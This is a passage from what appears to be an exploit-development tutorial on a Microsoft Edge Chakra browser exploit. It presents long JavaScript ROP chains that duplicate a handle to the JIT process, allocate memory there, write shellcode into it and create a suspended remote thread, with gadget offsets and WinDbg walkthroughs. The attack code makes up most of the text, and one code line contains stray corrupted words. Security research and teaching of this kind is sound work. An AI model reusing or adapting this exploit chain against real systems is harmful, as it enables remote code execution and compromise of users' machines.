	MEM_COMMIT | MEM_RESERVE,	// Reserve our memory and commit it to memory in one go
	PAGE_READWRITE			// Make our memory readable and writable
);

We can step into the jump with t and then use pt to hit the ret of VirtualAllocEx. At this point, as is generally true in assembly, RAX should contain the return value of VirtualAllocEx - which should be a pointer to a block of memory within the JIT process, size 0x1000, and RW.

If we try to examine this address within the debugger, we will see it is invalid memory.

However, if we attach a new WinDbg session (without closing out the current one) to the JIT process (we have already shown multiple times in this blog post how to identify the JIT process) we can see this memory is committed.

As we can see, our second ROP chain was successful and we have allocated a page of RW memory within the JIT process. We will eventually write our shellcode into this allocation and use a final-stage ROP chain we will inject into the JIT process to mark this region as RWX.

WriteProcessMemory ROP Chain

At this point in our exploit, we have seen our ability to control memory within the remote JIT process - where ACG is disabled. As previously shown, we have allocated memory within the JIT process. Additionally, towards the beginning of the blog, we have stored our shellcode in the .data section of chakra.dll (see “Shellcode” section). We know this shellcode will never become executable in the current content process (where our exploit is executing) - so we need to inject it into the JIT process, where ACG is disabled. We will setup a call to WriteProcessMemory in order to write our shellcode into our new allocation within the JIT server.

Here is how our call to WriteProcessMemory will look:

WriteProcessMemory(
	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(VirtualAllocEx_Allocation),		// Address of our return value from VirtualAllocEx (where we want to write our shellcode)
	addressof(data_chakra_shellcode_location),	// Address of our shellcode in the content process (.data of chakra) (what we want to write (our shellcode))
	sizeof(shellcode)				// Size of our shellcode
	NULL 						// Optional
);

Here is the instrumentation of our ROP chain (including DuplicateHandle and VirtualAllocEx for continuity purposes):

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();is in its final state
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

Our ROP chain starts with the following gadget:

write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();

This gadget is also used four times before our first gadget within the WriteProcessMemory ROP chain. So, we will re-execute our updated exploit and set a breakpoint on this gadget and hit g in WinDbg five times in order to get to our intended first gadget (four times to “bypass” the other uses, and once more to get to our intended gadget).

Our first ROP sequence in our case is not going to actually involve WriteProcessMemory. Instead, we are going to store our VirtualAllocEx allocation (which should still be in RAX, as our previous ROP chain called VirtualAllocEx, which places the address of the allocation in RAX) in a “permanent” location within the .data section of kernelbase.dll. Think of this as we are storing the allocation returned from VirtualAllocEx in a “global variable” (of sorts):

write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

At this point we have achieved persistent storage of where we would like to allocate our shellcode (the value returned from VirtualAllocEx). We will be using RAX in our ROP chain for WriteProcessMemory, so in this case we persistently store it so we do not “clobber” this value with our ROP chain. Having said that, our first item on the WriteProcessMemory docket is to place the size of our write operation (~ sizeof(shellcode), of 0x1000 bytes) into R9 as the nSize argument.

We start this process, of which there are many examples in this blog post, by placing a writable address in RAX which we do not care about, to grant us access to the mov r9, rcx ; cmp r8d, [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret gadget. This allows us to place our intended value of 0x1000 into R9.

Our call to WriteProcessMemory is now in the following state:

WriteProcessMemory(
	-
	-
	-
	sizeof(shellcode)				// Size of our shellcode
	-
);

Next up in our ROP sequence is the hProcess parameter, also known as our PROCESS_ALL_ACCESS handle to the JIT server. We can simply just fetch this from the .data section of chakra.dll, where we stored this value as a result of our DuplicateHandle call.

You’ll notice there is a mov [rax+0x20], rcx write operation that will write the contents of RCX into the memory address, at an offset of 0x20, in RAX. You’ll recall we “prepped” RAX already in this ROP sequence when dealing with the nSize parameter - meaning RAX already has a writable address, and the write operation will not cause an access violation (e.g. writing to a non-writable address).

Our call to WriteProcessMemory is now in the following state:

WriteProcessMemory(
	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	-
	-
	sizeof(shellcode)				// Size of our shellcode
	-
);

The next parameter we are going to deal with is lpBaseAddress. In our call to WriteProcessMemory, this is the address within the process denoted by the handle supplied in hProcess (the JIT server process where ACG is disabled). We control a region of one memory page within the JIT process, as a result of our VirtualAllocEx ROP chain. This allocation (which resides in the JIT process) is the address we are going to supply here.

This ROP sequence is slightly convoluted, so I will provide the snippet (which is already above) directly below for continuity/context:

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

We can simply pop the address where we stored the address of our JIT process allocation (via VirtualAllocEx) into the RDX register. However, this is where things get “interesting”. There were no good gadgets within chakra.dll to directly dereference RDX and place it into RDX (mov rdx, [rdx] ; ret). The only gadget to do so, as we see above, is mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret. We can see we are able to dereference RDX and store it in RDX, but not via RDX directly instead, we have the ability to take whatever memory address is stored in RDX, at an offset of 0x8, and place this into RDX. So, we do a bit of math here. If we pop our jit_allocation-0x8 into RDX, when the mov rdx, [rdx+0x8] occurs, it will take the value in RDX, add 8 to it, and dereference the contents - storing them in RDX. Since -0x8 + +0x8 = 0, we simply “offset” the difference as a “hack”, of sorts, to ensure RDX contains the base address of our allocation.

Our call to WriteProcessMemory is now in the following state:

WriteProcessMemory(
	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(VirtualAllocEx_Allocation),		// Address of our return value from VirtualAllocEx (where we want to write our shellcode)
	-
	sizeof(shellcode)				// Size of our shellcode
	-
);

Now, our next item is to knock out the lpBuffer parameter. This is the easiest of our parameters, as we have already stored the shellcode we want to copy into the remote JIT process in the .data section of chakra.dll (see “Shellcode” section of this blog post).

Our call is now in the following state:

WriteProcessMemory(
	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(VirtualAllocEx_Allocation),		// Address of our return value from VirtualAllocEx (where we want to write our shellcode)
	addressof(data_chakra_shellcode_location),	// Address of our shellcode in the content process (.data of chakra) (what we want to write (our shellcode))
	sizeof(shellcode)				// Size of our shellcode
	NULL 						// Optional
);

The last items on the agenda are to load kernelbase!WriteProcessMemory into RAX and jmp to it, and also write our last parameter to the stack at RSP + 0x28 (NULL/0 value).

Now, before we hit the jmp rax instruction to jump into our call to WriteProcessMemory, let’s attach another WinDbg debugger to the JIT process and examine the lpBaseAddress parameter.

We can see our allocation is valid, but is not set to any value. Let’s hit t in the content process WinDbg session and then pt to execute the call to WriteProcessMemory, but pausing before we return from the function call.

Now, let’s go back to the JIT process WinDbg session and re-examine the contents of the allocation.

As we can see, we have our shellcode mapped into the JIT process. All there is left now (which is a slight misnomer, as it is several more chained ROP chains) is to force the JIT process to mark this code as RWX, and execute it.

CreateRemoteThread ROP Chain

We now have a remote allocation within the JIT process, where we have written our shellcode to. As mentioned, we now need a way to execute this shellcode. As you may, or may not know, on Windows threads are what are responsible for executing code (not a process itself, which can be though of as a “container of resources”). What we are going to do now is create a thread within the JIT process, but we are going to create this thread in a suspended manner. As we know, our shellcode is sitting in readable and writable page. We first need to mark this page as RWX, which we will do in the later portions of this blog. So, for now, we will create the thread which will be responsible for executing our shellcode in the future - but we are going to create it in a suspended state and reconcile execution later. CreateRemoteThread is an API, exported by the Windows API, which allows a user to create a thread in a remote process. This will allow us to create a thread within the JIT process, from our current content process. Here is how our call will be setup:

CreateRemoteThread(
	fulljitHandle,			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Default SECURITY_ATTRIBUTES
	0,				// Default Stack size
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)
	NULL,				// No variable needs to be passed
	4,				// CREATE_SUSPENDED (Create the thread in a suspended state)
	NULL 				// Don't return the thread ID (we don't need it)
);

This call requires mostly everything to be set to NULL or 0, with the exception of two parameters. We are creating our thread in a suspended state to ensure execution doesn’t occur until we explicitly resume the thread. This is because we still need to overwrite the RSP register of this thread with our final-stage ROP chain, before the ret occurs. Since we are setting the lpStartAddress parameter to the address of a ROP gadget, this effectively is the entry point for this newly-created thread and it should be the function called. Since it is a ROP gadget that performs ret, execution should just return to the stack. So, when we eventually resume this thread, our thread (which is executing in he remote JIT process, where ACG is disabled), will return to whatever is located on the stack. We will eventually update RSP to point to.

Here is how this looks in ROP form (with all previous ROP chains added for context):

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
